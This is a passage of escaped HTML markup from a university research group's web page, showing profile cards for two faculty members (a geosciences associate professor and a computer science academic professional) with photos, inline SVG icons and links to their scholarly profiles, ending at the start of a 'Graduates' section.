href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg\" class=\"wp-image-1634 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c64-outer\">\n            <div data-colibri-id=\"182-c64\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c64 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c65\" class=\"d-block style-973 style-local-182-c65 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Faris-e1697216253732.jpg\" class=\"wp-image-1814 style-973-image style-local-182-c65-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c65-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-974 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Faris Hawamdeh</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c67\" class=\"h-text h-text-component style-975 style-local-182-c67 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Academic Professional\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c68\" class=\"h-text h-text-component style-976 style-local-182-c68 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c69\" class=\"style-977 style-local-182-c69 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/faris-hawamdeh/?trk=public_profile_publication_contributor-image\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/faris-hawamdeh/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Faris-Hawamdeh\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c73\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c73 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c146\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c146 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c147-outer\">\n            <div data-colibri-id=\"182-c147\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c147 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c148\" class=\"h-global-transition-all h-heading style-862 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c148\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div 